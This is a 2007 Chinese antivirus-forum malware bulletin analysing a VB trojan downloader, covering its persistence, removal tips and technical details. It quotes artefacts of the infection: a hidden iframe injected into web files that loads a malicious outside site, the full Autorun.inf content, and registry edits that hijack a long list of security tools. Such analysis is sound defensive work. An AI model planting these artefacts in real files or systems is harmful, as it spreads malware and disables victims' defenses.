» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 病毒快报 » 木马程序Trojan-Downloader.Win32.VB.dth   作者: 标题: 木马程序Trojan-Downloader.Win32.VB.dth pioneer 超级版主 积分 4563 发帖 4545 注册 2007-7-16 来自 BJ #1  木马程序Trojan-Downloader.Win32.VB.dth 病毒名称 Trojan-Downloader.Win32.VB.dth 捕获时间 2007-12-15 病毒症状 　　该病毒是一个使用VB编写的木马下载程序，采用NSPack加壳以躲过特征码扫描，加壳后长度59,282字节，图标为一绿色小瓢虫图标，病毒扩展名为exe，主要通过移动存储、局域网传播。 病毒分析 　　该样本程序被激活后，将在%systemroot%\system32 生成Taskeep.vbs、netshare.cmd、Avpser.cmd、SDGames.exe文件； 　　通过修改注册表，在注册表HKLM的Run下新建子项Winstary，其值为“C:\WINDOWS\system32\SDGames.exe”，以达到病毒自启动的目的； 　　同时病毒还修改系统的win.ini文件，使得病毒能随系统启动而运行； 利用命令行将winmgmt服务类型设置成自动，并启动这个服务，用以运行Taskeep.vbs中的代码； 　　关闭WINDOWS 安全中心，使得病毒传播时不被防火墙拦截； 　　病毒运行Taskeep.vbs用以循环执行病毒自身； 　　运行netshare.cmd将用户A盘至Z盘在局域网中共享；并试图利用net user命令添加一个guest用户，并将此用户添加到系统管理员组中并激活；　　       之后病毒运行Avpser.cmd试图结束各种杀毒软件和安全工具的进程，修改注册表映像劫持各种杀毒软件，同时修改系统时间为2030年，使得部分杀毒软件监控失效； 　　病毒通过修改注册表相关键值更改IE主页为“http:/ /www.zhidaobaidu.10mb.cn”，破坏系统安全模式，禁用任务管理器、禁用控制面板、禁止修改系统配置、锁定主页、禁用注册表编辑器、隐藏系统隐藏文件等，使用户在清除病毒带来重重困难。修改注册表更改计算机上的 reg 和 txt 文件关联指向“%systemroot%\system3\SDGames.exe”。       　　枚举所有盘符，在各个盘符下生成SDGame.exe和Autorun.inf，以及 三个url文件Recycleds.url、Windows.url，新建文件夹.url，这三个url文件都指向SDGame.exe，使用快捷方式诱惑用户运行病毒； 　　枚举逻辑驱动器用户计算机中的除系统盘外所有盘符中的可执行文件，使用CreateFile将文件打开后利用WriteFile将文件写入的方式覆盖感染，被感染的可执行文件图标将变成绿色小瓢虫图标，由于病毒未创建互斥体，将造成多个病毒进程同时运行，使得用户系统资源被大量占用，从而导致系统速度明显下降的现象； 　　同时该病毒还感染扩展名为hta、html、htm、jsp、php、asp网页文件，在这些网页文件中插入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://zhidaobaidu.10mb.cn/" name="Myframe" align="center" border="0">代码，使得用户打开这些网页文件时会从指定网页中下载大量病毒木马文件。　　 感染对象 Windows 2000/Windows XP/ Windows 2003 传播途径 网页木马，文件捆绑，移动存储，局域网传播 安全提示 　　已安装使用微点主动防御软件的用户，无须任何设置，微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本，微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您“发现未知木马”，请直接选择删除处理（如图1）； 　　如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现“Trojan-Downloader.Win32.VB.dth”，请直接选择删除（如图2）。 　　对于未使用微点主动防御软件的用户，微点反病毒专家建议： 　　1、不要在不明站点下载非官方版本的软件进行安装，避免病毒通过捆绑的方式进入您的系统。 　　2、建议关闭U盘自动播放，具体操作步骤：开始->运行->gpedit.msc->计算机配置->管理模板->系统->在右侧找到"关闭自动播放"->双击->选择"已启用"。 　　3、尽快将您的杀毒软件特征库升级到最新版本进行查杀，并开启防火墙拦截网络异常访问，如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。 　　4、开启windows自动更新，及时打好漏洞补丁。 ※文章所有权归【pioneer】与【东方微点论坛】共同所有，转载请注明出处！※ 2007-12-23 21:15 pioneer 超级版主 积分 4563 发帖 4545 注册 2007-7-16 来自 BJ #2   技术细节 病毒添加的注册表信息： 项：HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 键值：Winstary 指向文件：C:\WINDOWS\system32\SDGames.exe 项：HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows 键值：run 指向文件：C:\WINDOWS\system32\SDGames.exe 项：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ avp.exe 项：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ autoruns.exe 被映像劫持的杀毒软件包括：avp.exe、360rpt.exe、360Safe.exe、360tray.EXE、adam.exe、AgentSvr.exe、AppSvc32.exe、avgrssvc.exe、AvMonitor.exe、CCenter.exe、ccSvcHst.exe、FileDsty.exe、FTCleanerShell.exe、HijackThis.exe、IceSword.exe、iparmo.exe、Iparmor.exe、isPwdSvc.exe、kabaload.exe、KASMain.exe、KASTask.exe、KAV32.exe、KAVDX.exe、KAVPFW.exe、KAVSetup.exe、KAVStart.exe、msconfig.exe、KWatch.exe、KWatch9x.exe、KWatchX.exe、loaddll.exe、MagicSet.exe、mcconsol.exe、mmqczj.exe、mmsk.exe、NAVSetup.exe、nod32krn.exe、Knod32kui.exe、PFW.exe、PFWLiveUpdate.ex、eQHSET.exe、Ras.exe、Rav.exe、RavMon.exe、RavMonD.exe、RavStub.exe、RavTask.exe、RegClean.exe、rfwcfg.exe、RfwMain.exe、rfwProxy.exe、rfwsrv.exe、Rsaupd.exe、runiep.exe、scan32.exe、safelive.exe、shcfg32.exeS、martUp.exe、SREng.exe、symlcsvc.exe、SysSafe.exe、TrojanDetector.exe、Trojanwall.exe、UIHost.exe、UmxAgent.exe、UmxAttachment.exe、UmxCfg.exe、UmxFwHlp.exe、UmxPol.exe、UpLive.EXE、WoptiClean.exe、MainCon.exe、autoruns.exe 病毒修改的注册表信息： 项：HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess 键值：Start 数值数据：00000002 项：HKCU\ Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced 键值：SuperHidden 数值数据：2 项：HKCU \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced 键值：HideFileExt 数值数据：1 项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System 键值：DisableRegistryTools 数值数据：00000001 项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System 键值：DisableTaskMgr 数值数据：00000001 项：HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System 键值：DisableCMD 数值数据：00000000 项：HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值：NoControlPanel 数值数据：00000001 项：HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值：NoSetTas 数值数据：00000001 项：HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值：NoViewContextView 数值数据：00000001 项：HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值：NoFolderOptions 数值数据：00000001 项：HKCU\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值：NoSetTaskBar 数值数据：00000001 Autorun.inf文件内容如下： [Autorun] OPEN=SDGames.exe Shell\Open=打开(^&O) Shell\Open\Command=SDGames.exe Shell\Explore=资源管理器(^&X) Shell\Explore\Command=SDGames.exe ※文章所有权归【pioneer】与【东方微点论坛】共同所有，转载请注明出处！※ 2007-12-23 21:18 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号